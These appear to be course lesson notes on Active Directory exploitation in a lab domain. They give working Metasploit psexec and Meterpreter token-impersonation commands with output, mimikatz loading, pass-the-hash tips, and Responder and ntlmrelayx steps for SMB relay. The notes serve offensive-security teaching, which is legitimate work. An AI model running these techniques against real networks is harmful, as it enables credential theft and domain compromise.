Week 9: NTLM

NTLM Relay, Token Impersonation, Pass the Hash, PsExec, and more

Active Directory Exploitation - This lesson focuses on the recognition of vulnerabilities and exploitation tactics in an internal Active Directory environment. Attacks that will be introduced include: LLMNR poisoning/hash cracking, SMB hash relaying, pass the hash, token impersonation, kerberoasting, GPP/c-password attacks, and PowerShell attacks. More attacks will likely be added as the lesson is written, but the most common have been provided.

Important Readings


CrackMapExec and psexec

  • install crackmapexec

  • msf5 > use exploit/windows/smb/psexec

  • try all the target options for psexec: set target 3

    • Automatic

    • Powershell

    • Native Upload

    • MOF upload

  • sysinfo

    • x64 Architecture but 32-bit Meterpreter

    • you can look through payloads and find a better one sometime

meterpreter > load incognito
meterpreter > list_tokens -u # users
meterpreter > list_tokens -g # group
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token MARVEL\\Administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > getuid
Server username: MARVEL\Administrator
meterpreter > shell

In meterpreter shell, type load and hit tab twice to see all the different things to load, e.g. kiwi, mimikatz

# with a meterpreter session running
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(post/multi/recon/local_exploit_suggester) > set session 1
msf5 post(post/multi/recon/local_exploit_suggester) > run
# enter session
msf5 > sessions 1
# check processes
meterpreter > ps
  • Process Migration, get a x64 Meterpreter shell

  • Local Administrator account could be the same across many computers if IT images them from the same base image.

  • You can pass the hash with crackmapexec -H or with psexec

NTLM Relay

If communications are not digitally signed, you can NTLM relay. SMB signing is defaulted OFF.

  • Heath demonstrates environment were a user has administrative privileges on multiple machines.

  • Edited Responder.conf: Turned off SMB and HTTP server

  • Start Responder.py -I eth0 -rdw

    • Wait

locate ntlmrelayx.py # it's in impacket
python ntlmrelayx.py -tf target.txt -smb2support
  • point a victim machine to yours to in File Explorer e.g. \\

Last updated